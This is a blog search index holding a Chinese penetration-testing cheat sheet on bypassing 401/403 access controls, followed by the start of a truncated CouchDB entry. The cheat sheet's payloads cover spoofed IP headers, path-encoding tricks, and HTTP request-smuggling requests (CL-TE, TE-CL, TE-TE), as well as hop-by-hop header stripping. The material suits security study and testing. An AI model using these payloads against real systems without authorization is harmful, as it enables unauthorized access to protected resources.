search.xml

<?xml version="1.0" encoding="utf-8"?>
<search>
  <entry>
    <title>401-and-403-Bypass 手册</title>
    <url>/2023/11/26/401-and-403-Bypass/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<p><strong>☺️目录列表</strong></p>
<hr>
<p>🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️🕵️</p>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p><strong>部分常见的HTTP响应状态码的介绍：</strong></p>
<ol>
<li>200 OK：表示请求成功。服务器成功处理了客户端的请求，并返回了请求的内容。</li>
<li>201 Created：表示请求已成功，并在服务器上创建了新的资源。</li>
<li>204 No Content：表示服务器成功处理了请求，但没有返回任何内容。通常在不需要返回响应主体的情况下使用，例如对DELETE请求的确认。</li>
<li>400 Bad Request：表示客户端发送的请求有错误，服务器无法处理。常见的原因包括请求参数缺失、参数格式错误等。</li>
<li>401 Unauthorized：表示请求需要身份验证，但客户端未提供有效的身份凭证。</li>
<li>403 Forbidden：表示服务器理解请求，但拒绝执行。通常是由于权限不足导致的，即使客户端提供了身份凭证。</li>
<li>404 Not Found：表示请求的资源在服务器上未找到。</li>
<li>500 Internal Server Error：表示服务器在处理请求时遇到了错误。这可能是由于服务器内部的错误导致的，而不是客户端的错误。</li>
</ol>
<ul>
<li><a href="https://websec.readthedocs.io/zh/latest/network/http/http.html?highlight=403#http-1xx">https://websec.readthedocs.io/zh/latest/network/http/http.html?highlight=403#http-1xx</a>  完整请求参考</li>
</ul>
<h1 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h1><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">burpsuite 插件</span><br><span class="line"><span class="attr">https</span>:<span class="comment">//portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122</span></span><br><span class="line"><span class="number">403</span> bypass</span><br><span class="line"></span><br><span class="line"><span class="title class_">Automatic</span> <span class="title class_">Tools</span> 自动工具</span><br><span class="line"></span><br><span class="line"> <span class="attr">https</span>:<span class="comment">//github.com/lobuhi/byp4xx </span></span><br><span class="line"></span><br><span class="line"> <span class="attr">https</span>:<span class="comment">//github.com/iamj0ker/bypass-403 </span></span><br><span class="line"></span><br><span class="line"> <span class="attr">https</span>:<span class="comment">//github.com/gotr00t0day/forbiddenpass </span></span><br><span class="line"></span><br><span class="line"><span class="title class_">Burp</span> <span class="title class_">Extension</span> - <span class="number">403</span>呼吸器</span><br></pre></td></tr></table></figure>

<h2 id="修改请求"><a href="#修改请求" class="headerlink" title="修改请求"></a>修改请求</h2><figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**如**</span><br><span class="line"><span class="variable constant_">POST</span> /admin <span class="variable constant_">HTTP</span>/<span class="number">1.1</span></span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span></span><br><span class="line">...</span><br><span class="line">**改为**</span><br><span class="line"><span class="variable constant_">GET</span> /admin <span class="variable constant_">HTTP</span>/<span class="number">1.1</span></span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span></span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="variable constant_">GET</span></span><br><span class="line"><span class="variable constant_">HEAD</span></span><br><span class="line"><span class="variable constant_">POST</span></span><br><span class="line"><span class="variable constant_">PUT</span></span><br><span class="line"><span class="variable constant_">DELETE</span></span><br><span class="line"><span class="variable constant_">CONNECT</span></span><br><span class="line"><span class="variable constant_">OPTIONS</span></span><br><span class="line"><span class="variable constant_">TRACE</span></span><br><span class="line"><span class="variable constant_">PATCH</span></span><br><span class="line"><span class="variable constant_">FOO</span> # non existant method also might work</span><br><span class="line"></span><br><span class="line">****************字典列表 /usr/share/seclists/<span class="title class_">Fuzzing</span>/http-request-methods.<span class="property">txt</span>****************</span><br></pre></td></tr></table></figure>

<h2 id="User-Agent-修改"><a href="#User-Agent-修改" class="headerlink" title="User-Agent 修改"></a><strong>User-Agent 修改</strong></h2><p>有时，开发人员希望根据您用来访问网络应用程序的浏览器&#x2F;操作系统类型来提供不同的内容。   如果配置错误，您可能只能通过修改用户代理来访问资源。</p>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; <span class="title class_">Linux</span> i686; U;<span class="attr">rv</span>: <span class="number">1.7</span><span class="number">.13</span>) <span class="title class_">Gecko</span>/<span class="number">20070322</span></span><br><span class="line">  <span class="title class_">Kazehakase</span>/<span class="number">0.4</span><span class="number">.4</span><span class="number">.1</span></span><br><span class="line">  </span><br><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; U; <span class="title class_">Linux</span> <span class="number">2.4</span><span class="number">.2</span>-<span class="number">2</span> i586; en-<span class="variable constant_">US</span>; m18) <span class="title class_">Gecko</span>/<span class="number">20010131</span></span><br><span class="line">  <span class="title class_">Netscape6</span>/<span class="number">6.01</span></span><br><span class="line">  </span><br><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; U; <span class="title class_">Linux</span> i686; de-<span class="variable constant_">AT</span>; <span class="attr">rv</span>:<span class="number">1.8</span><span class="number">.0</span><span class="number">.2</span>) <span class="title class_">Gecko</span>/<span class="number">20060309</span></span><br><span class="line">  <span class="title class_">SeaMonkey</span>/<span class="number">1.0</span></span><br><span class="line">  </span><br><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; U; <span class="title class_">Linux</span> i686; en-<span class="variable constant_">GB</span>; <span class="attr">rv</span>:<span class="number">1.7</span><span class="number">.6</span>) <span class="title class_">Gecko</span>/<span class="number">20050405</span></span><br><span class="line">  <span class="title class_">Epiphany</span>/<span class="number">1.6</span><span class="number">.1</span> (<span class="title class_">Ubuntu</span>) (<span class="title class_">Ubuntu</span> package <span class="number">1.0</span><span class="number">.2</span>)</span><br><span class="line">  </span><br><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; U; <span class="title class_">Linux</span> i686; en-<span class="variable constant_">US</span>; <span class="title class_">Nautilus</span>/<span class="number">1.</span>0Final)</span><br><span class="line">  <span class="title class_">Gecko</span>/<span class="number">20020408</span></span><br><span class="line">  </span><br><span class="line"><span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="variable constant_">X11</span>; U; <span class="title class_">Linux</span> i686; en-<span class="variable constant_">US</span>; <span class="attr">rv</span>:<span class="number">0.9</span><span class="number">.3</span>) <span class="title class_">Gecko</span>/<span class="number">20010801</span></span><br><span class="line"></span><br><span class="line">**<span class="regexp">/usr/</span>share/seclists/<span class="title class_">Fuzzing</span>/<span class="title class_">User</span>-<span class="title class_">Agents</span>/     字典列表**</span><br></pre></td></tr></table></figure>

<h2 id="HTTP-Headers-修改"><a href="#HTTP-Headers-修改" class="headerlink" title="HTTP Headers 修改"></a><strong>HTTP Headers 修改</strong></h2><p>HTTP 标头模糊测试是另一种流行的方法，该技术涉及使用修改后的<br>HTTP 标头向目标服务器发送请求。  X-Forwarded-For、Referer 和 Authorization 标头是最常修改的标头。  X-Forwarded-For 可以进行模糊测试，以绕过依赖 IP 地址过滤的安全控制。  通过更改此标头中的 IP 地址，攻击者可以尝试绕过基于 IP 地址过滤的任何安全控制。</p>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="title class_">Headers</span>:</span><br><span class="line">- X-<span class="title class_">Forwarded</span>-<span class="title class_">For</span></span><br><span class="line">- X-<span class="title class_">Forward</span>-<span class="title class_">For</span></span><br><span class="line">- X-<span class="title class_">Forwarded</span>-<span class="title class_">Host</span></span><br><span class="line">- X-<span class="title class_">Forwarded</span>-<span class="title class_">Proto</span></span><br><span class="line">- <span class="title class_">Forwarded</span></span><br><span class="line">- <span class="title class_">Via</span></span><br><span class="line">- X-<span class="title class_">Real</span>-<span class="variable constant_">IP</span></span><br><span class="line">- X-<span class="title class_">Remote</span>-<span class="variable constant_">IP</span></span><br><span class="line">- X-<span class="title class_">Remote</span>-<span class="title class_">Addr</span></span><br><span class="line">- X-<span class="title class_">Trusted</span>-<span class="variable constant_">IP</span></span><br><span class="line">- X-<span class="title class_">Requested</span>-<span class="title class_">By</span></span><br><span class="line">- X-<span class="title class_">Requested</span>-<span class="title class_">For</span></span><br><span class="line">- X-<span class="title class_">Forwarded</span>-<span class="title class_">Server</span></span><br><span class="line">    </span><br><span class="line"><span class="title class_">Values</span>:</span><br><span class="line">- <span class="number">10.0</span><span class="number">.0</span><span class="number">.0</span></span><br><span class="line">- <span class="number">10.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">- <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">- <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">443</span></span><br><span class="line">- <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">80</span></span><br><span class="line">- localhost</span><br><span class="line">- <span class="number">172.16</span><span class="number">.0</span><span class="number">.0</span></span><br><span class="line"></span><br><span class="line">X-<span class="title class_">Originating</span>-<span class="attr">IP</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">Forwarded</span>-<span class="title class_">For</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">Forwarded</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"><span class="title class_">Forwarded</span>-<span class="title class_">For</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">Remote</span>-<span class="attr">IP</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">Remote</span>-<span class="title class_">Addr</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">ProxyUser</span>-<span class="title class_">Ip</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">Original</span>-<span class="attr">URL</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"><span class="title class_">Client</span>-<span class="attr">IP</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"><span class="title class_">True</span>-<span class="title class_">Client</span>-<span class="attr">IP</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"><span class="title class_">Cluster</span>-<span class="title class_">Client</span>-<span class="attr">IP</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line">X-<span class="title class_">ProxyUser</span>-<span class="title class_">Ip</span>: <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span></span><br><span class="line"><span class="title class_">Host</span>: localhost</span><br><span class="line"></span><br><span class="line">如果路径受到保护，您可以尝试使用以下其他标头绕过路径保护：</span><br><span class="line">X-<span class="title class_">Original</span>-<span class="attr">URL</span>: <span class="regexp">/admin/</span><span class="variable language_">console</span></span><br><span class="line">X-<span class="title class_">Rewrite</span>-<span class="attr">URL</span>: <span class="regexp">/admin/</span><span class="variable language_">console</span></span><br><span class="line"></span><br><span class="line">******工具 <span class="attr">https</span>:<span class="comment">//github.com/carlospolop/fuzzhttpbypass******</span></span><br><span class="line"></span><br><span class="line">******字典 /usr/share/seclists/<span class="title class_">Miscellaneous</span>/web/http-request-headers****** </span><br></pre></td></tr></table></figure>

<h2 id="路径模糊测试"><a href="#路径模糊测试" class="headerlink" title="路径模糊测试"></a><strong>路径模糊测试</strong></h2><p>尝试通过添加符号来寻找替代路径来绕过 401 或 403 状态代码。  example.com&#x2F;admin 给你 403？  尝试添加 <code>/%2e/</code>或者 <code>/%252e/</code>到路径： <code>example.com/%252e/</code>管理并检查结果。  您还可以尝试其他创意文字。</p>
<p>🗯️: <code>“/%2e/”或“/%252e/”</code>序列表示“.”的 URL 编码版本。  字符，用于表示文件路径中的当前目录。  通过在 URL 路径中使用这一序列，服务器可能会将请求解释为访问与预期路径不同的路径，从而可能绕过基于原始路径的访问控制。</p>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">/../</span><br><span class="line">/...</span><br><span class="line">/..%<span class="number">00</span></span><br><span class="line">/..%<span class="number">01</span></span><br><span class="line">/..%0a</span><br><span class="line">/..%0d</span><br><span class="line">/..%<span class="number">09</span></span><br><span class="line">/~root</span><br><span class="line">/~admin</span><br><span class="line">/%<span class="number">20</span>/</span><br><span class="line"><span class="regexp">/%2e%2e/</span></span><br><span class="line"><span class="regexp">/%252e%252e/</span></span><br><span class="line"><span class="regexp">/%c0%af/</span></span><br><span class="line">/%e0%<span class="number">80</span>%af</span><br><span class="line"></span><br><span class="line">**<span class="regexp">/usr/</span>share/seclists/<span class="title class_">Fuzzing</span>   字典**</span><br></pre></td></tr></table></figure>

<h2 id="协议版本降级"><a href="#协议版本降级" class="headerlink" title="协议版本降级"></a><strong>协议版本降级</strong></h2><p>HTTP&#x2F;2 进不去？   尝试 1.1。   您还可以尝试所有其他技术以及降级协议，其中一种有用的技术可能是降级到 1.0 并完全删除主机标头 - 它可能会导致服务器出现意外行为。</p>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="number">0.9</span></span><br><span class="line"><span class="number">1.0</span></span><br><span class="line"><span class="number">1.1</span></span><br><span class="line"><span class="number">2</span></span><br></pre></td></tr></table></figure>

<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">清楚所有其他http标头 只保留一个 将<span class="variable constant_">HTTP</span>协议版本更改为<span class="number">1.0</span>。</span><br><span class="line">如果服务器和任何其他安全机制未以正确的方式配置，则当我们不将 <span class="title class_">Host</span> 放入标头时。 它将目标地址本身放入标头中，这使我们称为本地地址。</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">GET</span> /path   <span class="variable constant_">HTTP</span>/<span class="number">1.0</span></span><br><span class="line">**此方法可以绕过<span class="variable constant_">CDN</span>获得服务器真实<span class="variable constant_">IP</span>地址**</span><br></pre></td></tr></table></figure>

<h2 id="401-和-403-旁路技术"><a href="#401-和-403-旁路技术" class="headerlink" title="401 和 403 旁路技术"></a><strong>401 和 403 旁路技术</strong></h2><h3 id="大小写切换技术"><a href="#大小写切换技术" class="headerlink" title="大小写切换技术"></a><strong>大小写切换技术</strong></h3><p>它涉及更改 URL 路径中字符的大小写以尝试绕过访问控制。 <code>example.com/user</code>给你401？  尝试 <code>example.com/User</code>,  <code>example.com/%75ser</code>或者 <code>example.com/USer</code>ETC。</p>
<h3 id="HTTP-请求走私"><a href="#HTTP-请求走私" class="headerlink" title="HTTP 请求走私"></a><strong>HTTP 请求走私</strong></h3><ul>
<li>HTTP 请求走私可用于操纵 Web 服务器和 Web 应用程序防火墙的行为。   它涉及发送格式错误的 HTTP 请求，这些请求利用 HTTP 请求处理链中不同组件处理请求数据的方式差异。</li>
<li>在 401 和 403 状态代码的情况下，您可以使用 HTTP 请求走私来绕过身份验证和授权检查。</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">******************在一个请求中写入两个<span class="variable constant_">GET</span>等请求，第二个请求中删除<span class="title class_">User</span>-<span class="title class_">Agent</span>,<span class="title class_">HTTP2</span>转换为<span class="title class_">HTTP1</span>******************</span><br><span class="line"><span class="variable constant_">GET</span> /test?a=a% <span class="variable constant_">HTTP</span>/<span class="number">1.1</span></span><br><span class="line"><span class="title class_">Host</span>: admin.<span class="property">target</span>.<span class="property">com</span></span><br><span class="line"><span class="title class_">User</span>-<span class="title class_">Agent</span>: <span class="title class_">Mozilla</span>/<span class="number">5.0</span> (<span class="title class_">Windows</span> <span class="variable constant_">NT</span> <span class="number">10.0</span>; <span class="title class_">Win64</span>; x64) <span class="title class_">AppleWebKit</span>/<span class="number">537.36</span> (<span class="variable constant_">KHTML</span>, like <span class="title class_">Gecko</span>) <span class="title class_">Chrome</span>/<span class="number">104.0</span><span class="number">.5112</span><span class="number">.102</span> <span class="title class_">Safari</span>/<span class="number">537.36</span></span><br><span class="line"></span><br><span class="line"><span class="variable constant_">GET</span> /admin/login <span class="variable constant_">HTTP</span>/<span class="number">1.1</span></span><br><span class="line"><span class="title class_">Host</span>: admin.<span class="property">target</span>.<span class="property">com</span></span><br><span class="line"></span><br><span class="line">================================================================================</span><br><span class="line">当前端服务器允许<span class="variable constant_">GET</span>请求携带请求体，而后端服务器不允许<span class="variable constant_">GET</span>请求携带请求体，它会直接忽略掉<span class="variable constant_">GET</span>请求中的 <span class="title class_">Content</span>-<span class="title class_">Length</span> 头，不进行处理。例如下面这个例子：</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">GET</span> / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">44</span>\r\n</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">GET</span> /secret <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line"></span><br><span class="line">前端服务器处理了 <span class="title class_">Content</span>-<span class="title class_">Length</span> ，而后端服务器没有处理 <span class="title class_">Content</span>-<span class="title class_">Length</span> ，基于pipeline机制认为这是两个独立的请求，就造成了漏洞的发生。</span><br><span class="line">================================================================================</span><br><span class="line">根据<span class="variable constant_">RFC</span> <span class="number">7230</span>，当服务器收到的请求中包含两个 <span class="title class_">Content</span>-<span class="title class_">Length</span> ，而且两者的值不同时，需要返回<span class="number">400</span>错误，但是有的服务器并没有严格实现这个规范。这种情况下，当前后端各取不同的 <span class="title class_">Content</span>-<span class="title class_">Length</span> 值时，就会出现漏洞。例如：</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">POST</span> / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">8</span>\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">7</span>\r\n</span><br><span class="line"></span><br><span class="line"><span class="number">12345</span>\r\n</span><br><span class="line">a</span><br><span class="line"></span><br><span class="line">这个例子中a就会被带入下一个请求，变为 aGET / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n 。</span><br><span class="line">================================================================================</span><br><span class="line"><span class="variable constant_">CL</span>-<span class="variable constant_">TE</span>指前端服务器处理 <span class="title class_">Content</span>-<span class="title class_">Length</span> 这一请求头，而后端服务器遵守<span class="title class_">RFC2616</span>的规定，忽略掉 <span class="title class_">Content</span>-<span class="title class_">Length</span> ，处理 <span class="title class_">Transfer</span>-<span class="title class_">Encoding</span> 。例如：</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">POST</span> / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line">...</span><br><span class="line"><span class="title class_">Connection</span>: keep-alive\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">6</span>\r\n</span><br><span class="line"><span class="title class_">Transfer</span>-<span class="title class_">Encoding</span>: chunked\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line">a</span><br><span class="line"></span><br><span class="line">这个例子中a同样会被带入下一个请求，变为 aGET / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n 。</span><br><span class="line">================================================================================</span><br><span class="line"><span class="variable constant_">TE</span>-<span class="variable constant_">CL</span>指前端服务器处理 <span class="title class_">Transfer</span>-<span class="title class_">Encoding</span> 请求头，而后端服务器处理 <span class="title class_">Content</span>-<span class="title class_">Length</span> 请求头。例如：</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">POST</span> / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line">...</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">4</span>\r\n</span><br><span class="line"><span class="title class_">Transfer</span>-<span class="title class_">Encoding</span>: chunked\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">12</span>\r\n</span><br><span class="line">aPOST / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line">================================================================================</span><br><span class="line"><span class="variable constant_">TE</span>-<span class="variable constant_">TE</span>指前后端服务器都处理 <span class="title class_">Transfer</span>-<span class="title class_">Encoding</span> 请求头，但是在容错性上表现不同，例如有的服务器可能会处理 <span class="title class_">Transfer</span>-encoding ，测试例如：</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">POST</span> / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Host</span>: example.<span class="property">com</span>\r\n</span><br><span class="line">...</span><br><span class="line"><span class="title class_">Content</span>-<span class="attr">length</span>: <span class="number">4</span>\r\n</span><br><span class="line"><span class="title class_">Transfer</span>-<span class="title class_">Encoding</span>: chunked\r\n</span><br><span class="line"><span class="title class_">Transfer</span>-<span class="attr">encoding</span>: cow\r\n</span><br><span class="line">\r\n</span><br><span class="line">5c\r\n</span><br><span class="line">aPOST / <span class="variable constant_">HTTP</span>/<span class="number">1.1</span>\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Type</span>: application/x-www-form-urlencoded\r\n</span><br><span class="line"><span class="title class_">Content</span>-<span class="title class_">Length</span>: <span class="number">15</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line">x=<span class="number">1</span>\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line">================================================================================</span><br><span class="line"></span><br><span class="line">**文章：**</span><br><span class="line"><span class="attr">https</span>:<span class="comment">//medium.com/@siratsami71/the-easiest-way-i-used-to-bypass-an-admin-panel-93d4297ed4a6</span></span><br><span class="line"><span class="attr">https</span>:<span class="comment">//websec.readthedocs.io/zh/latest/vuln/httpSmuggling.html</span></span><br><span class="line"><span class="attr">https</span>:<span class="comment">//github.com/xidaner/Freed0m/blob/master/%E7%AC%94%E8%AE%B0/%E5%AE%89%E5%85%A8/Web%E6%B8%97%E9%80%8F/web%E6%9C%8D%E5%8A%A1/HTTP%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/HTTP%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81.md</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="利用逐跳请求标头"><a href="#利用逐跳请求标头" class="headerlink" title="利用逐跳请求标头"></a><strong>利用逐跳请求标头</strong></h2><ul>
<li>逐跳标头是用于客户端和服务器之间通信的 HTTP 标头，不会由代理或缓存等中介转发。  这些标头被称为“逐跳”，因为它们是逐跳处理的，这意味着请求路径上的每个中介都会在标头通过时看到并可能修改标头。  HTTP&#x2F;1.1 规范将以下标头定义为逐跳标头：</li>
</ul>
<blockquote>
<p><strong>连接、保持活动、代理验证、代理授权、TE、尾部、传输编码</strong></p>
</blockquote>
<ul>
<li>当代理收到包含这些标头之一的请求时，它应该对其进行处理，然后在将请求转发到链中的下一个服务器之前删除标头。</li>
<li>💡！请注意，  <strong>HTTP&#x2F;2 协议</strong> 具有不同的处理标头的机制，其中“伪标头”的概念与常规标头的处理方式不同。</li>
</ul>
<p><strong>有趣的是，您可以通过将哪些标头添加到 Connection 标头来定义应删除的标头，如下所示：</strong></p>
<p>!<a href="https://blog.vidocsecurity.com/content/images/2023/04/image.png">https://blog.vidocsecurity.com/content/images/2023/04/image.png</a></p>
<ul>
<li><strong>例</strong></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Connection: close, X-Foo, X-Bar</span><br></pre></td></tr></table></figure>

<p>在此示例中，我们要求代理处理 <code>X-Foo</code>和 <code>X-Bar</code>作为逐跳，这意味着我们希望代理在传递请求之前将它们从请求中删除。 </p>
<ul>
<li>使用此技巧，您也许能够绕过 401 和 403<br>状态代码，只要请求链中的某些服务器依赖于代理添加&#x2F;中间服务器添加的标头，但您定义将其删除。<br>然而，值得注意的是，仅仅因为您可以删除链中某处的标头并不一定意味着主机容易受到攻击。<br>这只是利用底层问题的第一步，还需要进一步探索以确定是否可以用来绕过授权检查。<br>此外，重要的是要认识到此技术可能会在服务器端导致意外问题，具体取决于服务器如何处理已删除的标头。</li>
<li>快速且简单的测试是 <code>Cookie</code>标头，针对需要身份验证的端点（假设目标系统使用 cookie 身份验证）。  以以下请求为例：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">GET /api/me HTTP/1.1</span><br><span class="line">Host: foo.bar</span><br><span class="line">Cookie: session=xxx</span><br><span class="line">Connection: close, Cookie</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>如果我们这么说 <code>/api/me</code>当请求经过身份验证时，应该返回包含用户详细信息的 HTTP 200，并且 <code>session=xxx</code>是一个有效的经过身份验证的 cookie 会话值，那么如果系统允许原始请求中定义的逐跳标头来修改发送到后端的标头，则上述请求可能会返回预期响应之外的内容。</p>
<ul>
<li><strong>通过隐藏 X-Forwarded-For 来屏蔽原始 IP 地址</strong></li>
</ul>
<blockquote>
<p>当前端代理接受用户请求时，它可能会将该用户的IP地址添加到 <code>X-Forwarded-For</code>(XFF)标头，因此后端的基础设施和应用程序可以知道请求用户的 IP 地址。  但是，通过指示代理此标头是逐跳的，我们最终可能会从请求中删除此标头，并且后端应用程序要么永远不会收到它，要么会收到一个不是原始 IP 地址值用户，但属于链中其他位置的服务器。</p>
</blockquote>
<blockquote>
<p>另一件需要记住的事情是 XFF 只是一个用于传递用户真实 IP 地址的标头 - 根据目标系统，您可能还拥有 <code>Forwarded</code>,  <code>X-Real-IP</code>，以及其他一些不太常见的。</p>
</blockquote>
<p><strong>使用连接标头进行模糊测试的示例有效负载：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Hop by hop headers:</span><br><span class="line">- Accept</span><br><span class="line">- Accept-Application</span><br><span class="line">- Accept-Charset</span><br><span class="line">- Accepted</span><br><span class="line">- Accept-Encoding</span><br><span class="line">- Accept-Encodxng</span><br><span class="line">- Accept-Language</span><br><span class="line">- Accept-Ranges</span><br><span class="line">- Accept-Version</span><br><span class="line">- Access-Control-Allow-Credentials</span><br><span class="line">- Access-Control-Allow-Headers</span><br><span class="line">- Access-Control-Allow-Methods</span><br><span class="line">- Access-Control-Allow-Origin</span><br><span class="line">- Access-Control-Expose-Headers</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Spring框架特定的绕过技术"><a href="#Spring框架特定的绕过技术" class="headerlink" title="Spring框架特定的绕过技术"></a><strong>Spring框架特定的绕过技术</strong></h2><ul>
<li>版本 &lt; 5.3 有 <code>useSuffixPatternMatch</code>设置默认设置为 true。  这意味着方法映射到例如 <code>/admin</code>也会匹配 <code>/admin[.].*</code>。   它可用于绕过访问限制</li>
</ul>
<h1 id="😢over…-…-…"><a href="#😢over…-…-…" class="headerlink" title="😢over… … …"></a>😢over… … …</h1></div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>技巧</category>
        <category>401&amp;&amp;403-Bypass</category>
      </categories>
      <tags>
        <tag>Bypass</tag>
        <tag>401&amp;&amp;403</tag>
      </tags>
  </entry>
  <entry>
    <title>Couchdb 未授权访问</title>
    <url>/2023/05/17/Couchdb/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

